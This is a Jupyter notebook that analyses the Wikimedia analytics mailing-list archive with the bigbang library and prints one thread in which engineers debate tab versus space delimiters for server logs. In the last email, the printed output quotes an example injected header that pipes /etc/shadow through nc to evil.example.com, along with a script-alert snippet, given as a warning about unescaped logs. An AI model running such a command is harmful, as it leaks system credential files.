In [1]:
%matplotlib inline
from bigbang.archive import Archive
from bigbang.thread import Thread
from bigbang.thread import Node
import matplotlib.pyplot as plt
import datetime

First, collect data from a public email archive.


In [2]:
url = "https://lists.wikimedia.org/pipermail/analytics/"
arx = Archive(url,archive_dir="../archives")

We can count the number of threads in the archive easily. The first time you run Archive.get_thread it may take some time to compute, but the result is cached in the Archive object.


In [3]:
#threads = arx.get_threads()
len(arx.get_threads())


Out[3]:
628

We can plot a histogram of the number of messages in each thread. In most cases this will be a power law distribution.


In [4]:
y = [t.get_num_messages() for t in arx.get_threads()]

plt.hist(y, bins=30)
plt.xlabel('number of messages in a thread')
plt.show()


We can also plot the number of people participating in each thread. Here, the participants are differentiated by the From: header on the emails they've sent.


In [5]:
n = [t.get_num_people() for t in arx.get_threads()]

plt.hist(n, bins = 20)
plt.xlabel('number of email-address in a thread')
plt.show()


The duration of a thread is the amount of elapsed time between its first and last message.


In [6]:
y = [t.get_duration().days for t in arx.get_threads()]

plt.hist(y, bins = (10))
plt.xlabel('duration of a thread(days)')
plt.show()



In [7]:
y = [t.get_duration().seconds for t in arx.get_threads()]

plt.hist(y, bins = (10))
plt.xlabel('duration of a thread(seconds)')
plt.show()


You can examine the properties of a single thread.


In [8]:
print(arx.get_threads()[0].get_duration())


19:49:47

In [9]:
content = arx.get_threads()[0].get_root().data['Body']
content


Out[9]:
'Welcome to the the inaugural Analytics Mailing list email.\n\nHere all your analytics wishes comes true, \n\n\nso proposals, ideas, crazy ideas, crazy crazy ideas are welcome here!\nas long as we can count something it is welcome. \n\n\nD\n\n'

In [10]:
len(content.split())


Out[10]:
38

Suppose we want to know whether or not longer threads (that contain more distinct messages) have fewer words in them per message.


In [11]:
short_threads = []
long_threads = []
for t in arx.get_threads():
    if(t.get_num_messages() < 6): short_threads.append(t)
    else: long_threads.append(t)

In [12]:
print(len(short_threads))
print(len(long_threads))


471
157

You can get the content of a thread like this:


In [13]:
long_threads[0].get_content()


Out[13]:
["(Moving this to analytics list, cause uhhh, why not?)\nOk some more info!\nI was testing some of my changes to udp-filter on my test labs instance, and hey!  whadyaknow!  The test failed.  One of the failures was due to the content type field not matching correctly.  It looked like this:\n  text/html; charset=UTF-8\nAnd actually, my test didn't catch the charset portion of this, my regexp is matching via whitespace.  It was the semi-colon in the text/html string that caused the test to fail.\nI started sleuthing, and determined that this only shows up in my logs if I am hitting mediawiki pages.  I grepped mediawiki core, and found that there are tons of places that are manually setting the Content-Type header with the charset. \nSo I'm pretty sure the setting of the value of this header is coming directly from Mediawiki.  But, that isn't really our issue.  Headers are allowed to have spaces in the values.\nHere's some example log output with spaces in headers.\n  https://gist.github.com/2648312\n  \nSummary:\nNginx:  \n- Does not escape spaces in Content-Type\n- Does not escape spaces in Accept-Language\n- Does not escape spaces in any header (afaict*).\nVarnish:\n- Does not escape space in Content-Type\n+ Escapes spaces in Accept-Langage\n+ Escapes spaces in any header (afaict).\nSquid:\n~ Removes charset from Content-Type header (?)\n+ Escapes spaces in Accept-Language.\n+ Escapes spaces in any header (afaict).\nThe remaining question we need to answer:  Do we want to patch source code for these guys in order to fix this problem?  I'd rather not if we don't have to.  Do we have to?  Uhhh, dunno!\n-Ao\n*As Far As I Can Tell\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120509/189be49e/attachment-0001.html>\n",
 'Do we really need to write code? Don\'t all of these servers have a directive for setting a custom log format? (nginx: http://wiki.nginx.org/HttpLogModule#log_format)\nRelatedly, did you happen to try testing other whitespace characters? I suspect some subset of tabs \\t, vertical tabs \\v, and/or the line break family \\r\\n\\f get escaped consistently. (The stream modifiers \\b\\c\\h\\w are illegal.) If we were to figure that out, we could just switch to that character as the field delimiter and be done with it.\nps. It turns out it\'s legal to split header-values across newlines so long as the first character following the CRLF is a space or tab. So we might want to deal with that. Just sayin\'. (It\'s called Linear White Space -- LWS.)\nSome potentially useful HTTP RFC links:\n- LWS: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2\n- Modified BNF definition: http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2\n- The Content-Type definition, which talks about "extended" attributes in values, separated by semi-colons: http://www.w3.org/Protocols/rfc2616/rfc2616-sec3.html#sec3.7\n- Header definitions: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14\npps. For what it\'s worth, the C source to nginx\'s HTTP header parser is available:\n- ngx_http_parse_header_line: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_http_parse.c#l813\n- ngx_http_parse_multi_header_lines: http://mdounin.ru/hg/nginx-vendor-current/file/1e5c7a976f48/src/http/ngx_http_parse.c#l1666\n--\nDavid Schoonover\ndsc at wikimedia.org\n',
 "Yeah, that's what we want to do.  Robla is worried that changing the log format using tabs will break things for too many people.  Gotta find out how many and who.\n",
 'So far nobody has responded to my inquiry on whether they would be affected\nby this chance. So please let us know if you are consuming a server log and\nyou are expecting spaces as delimiters. We want to make sure that we are\naware of all the people that will be affected by this.\nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/609520e2/attachment-0001.html>\n',
 "There are more suggestions hanging in the air waiting to be shot down.\n \nCharacter replacement in c is very cheap. \nSo why not feed Diederik's filter with tab delimited data, and export space\ndelimited data?\n \nThe filter first replaces all (non delimiting) spaces by underscores, then\nreplaces all (delimiting) tabs by spaces.\n \nSimple, and downwards compatible.\n \nErik\n \nFrom: analytics-bounces at lists.wikimedia.org\n[mailto:analytics-bounces at lists.wikimedia.org] On Behalf Of Diederik van\nLiere\nSent: Thursday, May 10, 2012 3:57 PM\nTo: analytics at lists.wikimedia.org\nSubject: Re: [Analytics] Using tab as delimiter instead of space in the log\nfiles\n \nSo far nobody has responded to my inquiry on whether they would be affected\nby this chance. So please let us know if you are consuming a server log and\nyou are expecting spaces as delimiters. We want to make sure that we are\naware of all the people that will be affected by this.\n \nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/a60d63f4/attachment.html>\n",
 "I'd be cool with making this a flag to udp-filter, ja.  I wouldn't want to turn it on by default, but totally cool with that.  \n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/4347dfa4/attachment.html>\n",
 "Hi Erik,\nYes it is downwards compatible but does not outweigh the drawbacks. It's\nnot simple, as it creates a disconnect between the configuration of the\nserver log and the actual output. In addition, it is not a future proof\nsolution because we also want to stream the server log data to the\nanalytics cluster and then we will be still stuck with the same problem (as\nstreaming the data into the analytics cluster will not depend on the\nudp-filter software). We should apply a real solution not a monkey patch.\nD\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/f6db12ec/attachment-0001.html>\n",
 "Well, he's still suggesting we switch to tab as delimiter in sources.  Same solution, but with the extra bonus of allowing udp-filter to give our downstream consumers what they currently expect.\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/fb939b8f/attachment.html>\n",
 'I don\'t think charsub is all that complex or scary. However, I think substituting in _ is a really bad idea.\n** Once you do this, you cannot undo it, because _ is a valid character in all fields[1]. **\nAnd for some data, there\'s a huge difference. It may be obvious that "text/html;_charset_=_utf8" is "text/html; charset = utf8", but in the case of a client sending a URL that isn\'t properly URL-encoded, the meaning of the request is totally changed if you convert "http://wikimedia.org/ " (which should have been encoded by the sending client to "http://wikimedia.org/%20") to "http://wikimedia.org/_". But there\'s no inversion function: you don\'t know to if "http://wikimedia.org/_" is "http://wikimedia.org/ " or really, actually "http://wikimedia.org/_".\nSo the obvious next question is: why not escape them ourselves? Because now you need a string copy, as escaping isn\'t 1:1 in characters (" " becomes "\\ " (or whatever), which is more than one character). This comes back to what I was asking before: is there any whitespace character that is escaped by all our log sources? (My suspicion is that either \\r, \\n, or \\v is escaped by everyone.)\nIf we can\'t find a whitespace character, using a non-semantic control character (0x0-0x31) should work, but it\'s riskier as some downstream consumers might choke on non-printable characters. Still: the best option here, hands down, is Bell (\\a 0x07). Most unix programs understand it but don\'t do anything scary with it, and it doesn\'t change the meaning of the string. (We might make random machines beep. I am okay with this.) Additionally, it doesn\'t match \'\\s\' in PCRE, which some people might be using to split the output.\nIf for some reason Bell isn\'t acceptable, Form Feed (\\f 0x0C) is probably our next-best option. Unfortunately, it matches \'\\s\', and (heh) prints as six newlines. (But if you\'re printing our logs, god help you.) Using any of the rest is sketchy, though with some testing, the Device Control characters (0x11-0x14) might be okay.\n[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec2.html#sec2.2 -- "Many HTTP/1.1 header field values consist of words separated by LWS or special characters."\n       CHAR           = <any US-ASCII character (octets 0-127)>\n       CTL            = <any US-ASCII control character (octets 0-31 + 127)>\n       token          = 1*<any CHAR except CTLs or separators>\n       separators     = "(" | ")" | "<" | ">" | "@"\n                      | "," | ";" | ":" | "\\" | <">\n                      | "/" | "[" | "]" | "?" | "="\n                      | "{" | "}" | SP | HT\nSee also: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14\n--\nDavid Schoonover\ndsc at wikimedia.org\n',
 'Guys, this is turning into a complete bike-shed discussion.\nI suggest the following:\n1) We move to the tab character as delimiter, this not 100% accurate but\nwill cause way way way fewer issues than space\n2) We will extensively test this in the Labs environment where we have\nnginx/varnish/squid running\n3) We will notify all log consumers before hand, about 2 weeks notice.\n4) We will give Erik Zachte ample time to adjust and we supply him test\ndata. The two weeks notice starts as soon as Erik has given thumbs up.\nHow does that sound?\nBest,\nDiederik\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/d88d4325/attachment-0001.html>\n',
 'Also, the spaces -> _, tabs -> spaces underscore might be cool (or using whatever characters dsc suggests), but we don\'t have to think about that right now.  That would be an add on to udp-filter, and Erik said in a previous email that he wouldn\'t mind changing to split("\\t").\nSo.  spaces -> tabs it is.  :)\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/48b56c05/attachment.html>\n',
 "Diederik just asked me to check if I could reproduce the problem of spaces in logs for a request like this:\n  https://en.m.wikipedia.org/wiki/Extensor_carpi radialis longus\nAnswer:  nginx does not escape the spaces in the url.\nBut don't blame nginx!  nginx is just being honest!  The HTTP header had spaces in it, so it printed the spaces to the log file.  I think nginx did exactly what it was supposed to.   As David pointed out, it is allowed to have any whitespace  (even newlines) in an HTTP header.  Shouldn't the loggers just output what they see?  \nUsing tabs as the delimiter wouldn't solve the problem for ALL cases.  It is possible to put tabs in headers, (right?).  But for 99.999999% (that is a statistically researched number, don't question it) of cases, using tabs as delimiter would solve this problem.\n-------------- next part --------------\nAn HTML attachment was scrubbed...\nURL: <http://lists.wikimedia.org/pipermail/analytics/attachments/20120510/5c9a240e/attachment-0001.html>\n",
 'No, nginx should print that output in a context-appropriate fashion.\nFun possible http header fields:\n" ; cat /etc/shadow | nc evil.example.com 80\n<javascript>alert(\'whee!\');</javascript>\nNow, that\'s not to say that it\'s likely that we have vulnerabilities\nin these areas.  However, context matters, and printing spaces in a\nspace-delimited file is ...um... suboptimal.\nIt looks like the default for nginx is space-delimited, but to put\nquote marks around user input:\nhttp://wiki.nginx.org/HttpLogModule\n...which is a pretty fragile strategy (though perhaps less fragile\nthan not putting quote marks as we do).\nI agree with Andrew that we shouldn\'t maintain a patched version of\nnginx logging code.  However, if we submitted a patch for optionally\nescaping spaces in header fields, it seems pretty plausible that it\'d\nbe accepted.\nI suppose this would be fine.  I would recommend, though, making sure\nwe contact everyone listed as contacts in the filters list on locke,\nemery, and oxygen.\nRob\n']

How would you test to see if longer threads contain less words per message than shorter ones?


In [ ]: